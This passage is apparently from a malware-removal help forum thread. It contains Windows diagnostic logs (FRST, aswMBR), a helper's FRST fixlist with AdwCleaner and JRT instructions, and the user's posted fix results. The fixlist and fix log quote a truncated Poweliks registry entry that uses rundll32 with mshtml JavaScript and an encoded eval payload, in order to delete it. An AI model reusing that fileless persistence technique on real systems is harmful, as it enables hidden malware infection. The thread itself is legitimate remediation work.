CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
==================== Restore Points =========================
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {372C798C-A5B3-4AA4-BBF2-B7E73240D486} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {503D3F2D-3467-4AD0-AB8F-6DC6CC77FC61} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {795C9DD4-84DD-4612-B8E5-6C26954A7C70} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {7A4BB95A-5FCC-432C-90F8-E7E4AB110F1C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {C5E1112F-43F2-4BEE-99A2-79ADA35DF515} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {F741AF84-829D-46EF-8DB7-4841CBC7DCCE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
==================== Loaded Modules (whitelisted) =============
2011-04-25 11:24 - 2011-04-25 11:24 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2012-04-27 18:43 - 2012-03-19 18:09 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-03-09 09:58 - 2012-03-09 09:58 - 00462712 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
2012-03-09 09:58 - 2012-03-09 09:58 - 00057208 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2012-04-17 12:20 - 2012-04-17 12:20 - 00293376 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\vCapture64.dll
2012-03-28 14:15 - 2012-03-28 14:15 - 00013824 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\WMI_DLL64.dll
2012-04-27 18:03 - 2012-03-28 10:36 - 00128280 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 19:30 - 2012-05-03 17:56 - 00089600 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
2012-05-18 19:30 - 2012-05-03 12:48 - 00093696 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
2012-05-18 19:30 - 2012-04-20 19:11 - 00034816 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
2012-05-18 19:30 - 2012-03-15 13:19 - 00241664 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
2012-04-27 18:03 - 2012-03-28 10:18 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\Windows:nlsPreferences
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-1987813687-3303645166-2786259458-500 - Administrator - Disabled)
Guest (S-1-5-21-1987813687-3303645166-2786259458-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1987813687-3303645166-2786259458-1003 - Limited - Enabled)
Ryan (S-1-5-21-1987813687-3303645166-2786259458-1001 - Administrator - Enabled) => C:\Users\Ryan
UpdatusUser (S-1-5-21-1987813687-3303645166-2786259458-1000 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (10/30/2014 03:02:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 01:00:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 01:00:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BtvStack.exe, version: 7.4.0.122, time stamp: 0x4f387d95
Faulting module name: BtvStack.exe, version: 7.4.0.122, time stamp: 0x4f387d95
Exception code: 0xc0000005
Fault offset: 0x000000000007d778
Faulting process id: 0xe9c
Faulting application start time: 0xBtvStack.exe0
Faulting application path: BtvStack.exe1
Faulting module path: BtvStack.exe2
Report Id: BtvStack.exe3
Error: (10/30/2014 00:56:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname Ryan-PC.local already in use; will try Ryan-PC-2.local instead
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Ryan-PC.local. Addr 192.168.200.26
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.200.25:5353 4 Ryan-PC.local. Addr 192.168.200.25
Error: (10/29/2014 08:55:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/29/2014 08:39:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/29/2014 07:54:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BtvStack.exe, version: 7.4.0.122, time stamp: 0x4f387d95
Faulting module name: BtvStack.exe, version: 7.4.0.122, time stamp: 0x4f387d95
Exception code: 0xc0000005
Fault offset: 0x000000000007d778
Faulting process id: 0xb18
Faulting application start time: 0xBtvStack.exe0
Faulting application path: BtvStack.exe1
Faulting module path: BtvStack.exe2
Report Id: BtvStack.exe3
System errors:
=============
Error: (10/30/2014 03:02:42 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Error: (10/30/2014 03:01:51 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (10/30/2014 03:00:36 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:58:36 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:57:35 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:56:34 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:55:33 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:53:33 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:52:32 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Error: (10/30/2014 02:51:31 AM) (Source: iaStor) (EventID: 9) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
Microsoft Office Sessions:
=========================
Error: (10/30/2014 03:02:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 01:00:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 01:00:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: BtvStack.exe7.4.0.1224f387d95BtvStack.exe7.4.0.1224f387d95c0000005000000000007d778e9c01cff3fe534dd6daC:\Program Files (x86)\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Bluetooth Suite\BtvStack.exe9a33b6ca-5ff1-11e4-a198-006b9e00c96d
Error: (10/30/2014 00:56:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname Ryan-PC.local already in use; will try Ryan-PC-2.local instead
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Ryan-PC.local. Addr 192.168.200.26
Error: (10/30/2014 00:49:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.200.25:5353 4 Ryan-PC.local. Addr 192.168.200.25
Error: (10/29/2014 08:55:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/29/2014 08:39:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (10/29/2014 07:54:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: BtvStack.exe7.4.0.1224f387d95BtvStack.exe7.4.0.1224f387d95c0000005000000000007d778b1801cff3d398da8f89C:\Program Files (x86)\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Bluetooth Suite\BtvStack.exedb301af5-5fc6-11e4-844e-006b9e00c96d
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentage of memory in use: 31%
Total physical RAM: 8085.95 MB
Available physical RAM: 5516.39 MB
Total Pagefile: 16170.07 MB
Available Pagefile: 13398.46 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:919.21 GB) (Free:822.09 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 868B7EFA)
Partition 1: (Active) - (Size=600 MB) - (Type=27)
Partition 2: (Not Active) - (Size=919.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=27)
==================== End Of Log ============================
The aswMBR scan ran all night but finally finished. Here is the log:
aswMBR version 1.0.1.2161 Copyright(c) 2014 AVAST Software
Run date: 2014-10-30 03:27:53
-----------------------------
03:27:53.920 OS Version: Windows x64 6.1.7601 Service Pack 1
03:27:53.920 Number of processors: 8 586 0x3A09
03:27:53.920 ComputerName: RYAN-PC UserName: Ryan
03:27:55.449 Initialize success
03:27:55.480 VM: initialized successfully
03:27:55.496 VM: Intel CPU BiosDisabled
03:27:58.108 VM: supported disk I/O iaStor.sys
03:28:26.266 AVAST engine defs: 14102902
03:28:35.876 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-0
03:28:35.876 Disk 0 Vendor: ST1000LM 2AR1 Size: 953869MB BusType: 8
03:28:36.375 Disk 0 MBR read successfully
03:28:36.375 Disk 0 MBR scan
03:28:36.406 Disk 0 Windows 7 default MBR code
03:28:36.437 Disk 0 Partition 1 80 (A) 27 Hidden NTFS WinRE NTFS 600 MB offset 2048
03:28:36.437 Disk 0 default boot code
03:28:36.468 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 941267 MB offset 1230848
03:28:36.546 Disk 0 Partition 3 00 27 Hidden NTFS WinRE NTFS 12000 MB offset 1928945664
03:28:36.908 Disk 0 scanning C:\Windows\system32\drivers
03:29:01.702 Service scanning
03:29:36.064 Modules scanning
03:29:36.064 Disk 0 trace - called modules:
03:29:36.094 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys iaStor.sys hal.dll
03:29:36.094 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8007aa5790]
03:29:36.094 3 CLASSPNP.SYS[fffff88000fcc43f] -> nt!IofCallDriver -> [0xfffffa8007534a40]
03:29:36.104 5 ACPI.sys[fffff88000edf7a1] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-0[0xfffffa8007533050]
03:29:38.609 AVAST engine scan C:\Windows
03:29:47.929 AVAST engine scan C:\Windows\system32
03:34:15.274 AVAST engine scan C:\Windows\system32\drivers
03:34:47.109 AVAST engine scan C:\Users\Ryan
12:16:25.655 File: C:\Users\Ryan\AppData\LocalLow\ynsvabi.dll **INFECTED** Win32:Malware-gen
12:35:28.201 AVAST engine scan C:\ProgramData
12:44:42.706 Disk 0 statistics 4836813/0/22 @ 0.50 MB/s
12:44:42.722 Scan finished successfully
14:02:02.140 Disk 0 MBR has been saved successfully to "C:\Users\Ryan\Desktop\MBR.dat"
14:02:02.170 The log file has been saved successfully to "C:\Users\Ryan\Desktop\aswMBR.txt"
Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
start
CloseProcesses:
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
C:\Users\Ryan\AppData\Local\Temp\install_flashplayer11x32ax_gtbd_chrd_dn_aih.exe
C:\Users\Ryan\AppData\Local\Temp\InstHelper.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\pslist.exe
C:\Users\Ryan\AppData\Local\Temp\vlc-2.1.3-win32.exe
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
AlternateDataStreams: C:\Windows:nlsPreferences
C:\Users\Ryan\AppData\LocalLow\ynsvabi.dll
EmptyTemp:
Hosts:
End
Open FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-AdwCleaner-by Xplode
Click on this link to download : ADWCleaner (http://www.bleepingcomputer.com/download/adwcleaner/)
Click on ONE of the Two Blue Download Now buttons That have a blue arrow beside them and save it to your desktop.
Do not click on any links in the top Advertisment.
http://thespykiller.co.uk/files/adwcleaner_download.png
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click on Scan.
After the scan is complete click on "Clean"
Confirm each time with Ok.
Your computer will be rebooted automatically. A text file will open after the restart.
Please post the content of that logfile with your next answer.
You can find the logfile at C:\AdwCleaner[S1].txt as well.
NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why (http://www.im-infected.com/hijacker/isearch-avg-comsearch-hijacker.html) and Here (http://nojesusnopeas.blogspot.com/2012/08/sorry-but-avg-secure-search-is-malware.html). You can always Reinstall (http://www.avg.com/us-en/secure-search) it.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://imageshack.us/a/img841/7292/thisisujrt.gif
Please download Junkware Removal Tool (http://www.bleepingcomputer.com/download/junkware-removal-tool/) to your desktop.
Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.
please post
Fixlog.txt
C:\AdwCleaner.txt
JRT.txt
ascot1340
2014-10-31, 04:01
What light through yonder window breaks? It is the east, and Juliet is the sun!
The FRST, ADWCleaner, and JRT logs are posted below. Thanks so much for your help!
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 30-10-2014
Ran by Ryan at 2014-10-30 21:17:54 Run:1
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
CloseProcesses:
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
C:\Users\Ryan\AppData\Local\Temp\install_flashplayer11x32ax_gtbd_chrd_dn_aih.exe
C:\Users\Ryan\AppData\Local\Temp\InstHelper.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Ryan\AppData\Local\Temp\pslist.exe
C:\Users\Ryan\AppData\Local\Temp\vlc-2.1.3-win32.exe
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
AlternateDataStreams: C:\Windows:nlsPreferences
C:\Users\Ryan\AppData\LocalLow\ynsvabi.dll
EmptyTemp:
Hosts:
End
*****************
Processes closed successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
C:\Users\Ryan\AppData\Local\Temp\install_flashplayer11x32ax_gtbd_chrd_dn_aih.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\InstHelper.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\pslist.exe => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\vlc-2.1.3-win32.exe => Moved successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
C:\Windows => ":nlsPreferences" ADS removed successfully.
C:\Users\Ryan\AppData\LocalLow\ynsvabi.dll => Moved successfully.
C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.
EmptyTemp: => Removed 11.6 GB temporary data.
The system needed a reboot.
==== End of Fixlog ====
# AdwCleaner v3.311 - Report created 30/10/2014 at 21:48:34
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Ryan - RYAN-PC
# Running from : C:\Users\Ryan\Desktop\AdwCleaner.exe
# Option : Clean
***** [ Services ] *****
***** [ Files / Folders ] *****
Folder Deleted : C:\Users\Ryan\AppData\Roaming\Solvusoft
***** [ Scheduled Tasks ] *****
***** [ Shortcuts ] *****
***** [ Registry ] *****
***** [ Browsers ] *****
-\\ Internet Explorer v11.0.9600.17344
*************************
AdwCleaner[R0].txt - [726 octets] - [30/10/2014 21:46:47]
AdwCleaner[S0].txt - [650 octets] - [30/10/2014 21:48:34]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [709 octets] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.21.2014:1)
OS: Windows 7 Home Premium x64
Ran by Ryan on Thu 10/30/2014 at 21:53:26.13
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~ Services
~~~ Registry Values
~~~ Registry Keys
~~~ Files
~~~ Folders
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{07397CED-C113-4AEF-A421-43CD550D59A4}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{103122E5-ADB8-449D-9D3C-FA50A076A103}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{123FCFA8-6980-44C3-9103-F1450F5ED467}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{128F720C-66E1-4B91-9003-C27E2E4C61B1}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{1C9D2752-9710-4091-8C51-E0EF7CBA2810}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{20EE7515-C355-4EB4-8AA3-910A702ECF2F}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{2490B311-7A6F-46C7-A329-68B137444195}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{27010542-2504-42DF-905D-4B9C3E524A31}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{2A177609-A760-443F-8A9C-E8ECF175EF80}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{30047CF2-3191-430C-8641-B11BF8FDDAFF}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{31457A5B-6FCE-46D0-B56B-4641E0624866}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{36F15617-7E6D-4732-A8F5-C2014132756F}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{3D105088-F9CA-4197-97A4-0EE339D6919D}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{3DBEA061-F8AE-4985-A87D-BD3042D51622}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{47384F25-150D-468F-92ED-27C554B7A9C5}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{4A0EC5E1-8F23-4596-B545-B8C7A0A022C4}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{4A526934-0DD6-4F5A-8CEC-91B81B2DBF12}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{4D2A057C-8B4D-4416-BD46-D1999D9FFF8D}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{51CDD243-DDD0-453A-B0F8-C7D65983F8D4}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{51D1A8BE-4F23-46E6-826C-75D3E1F19DA8}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{541B2A8D-7AC4-49E4-A286-F6C79250C68F}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{5479510F-5463-4F62-ADCA-9AC121A05631}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{54D72C00-DF35-4A47-BFBF-E1A2D6FA60FB}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{56909F63-5468-403A-8B9B-E792AF4B71D0}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{57C03F51-67F4-421B-BD3B-27B7F238533D}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{620C5AE6-A641-4C49-B3FB-4A9E39176727}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{68762BA5-4488-46D9-A6CE-29F3F555E8AE}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{6D427CBA-7E1C-4319-B941-728736DE4F3B}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{7125917B-1544-4763-9C53-DDE46031608A}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{71AF1285-D4DD-4BAA-B42F-7816893A331F}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{74A7198E-0AA4-4B19-A7BA-EF144F355E92}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{7616541C-0DC4-4C57-AB92-A7A05160A085}
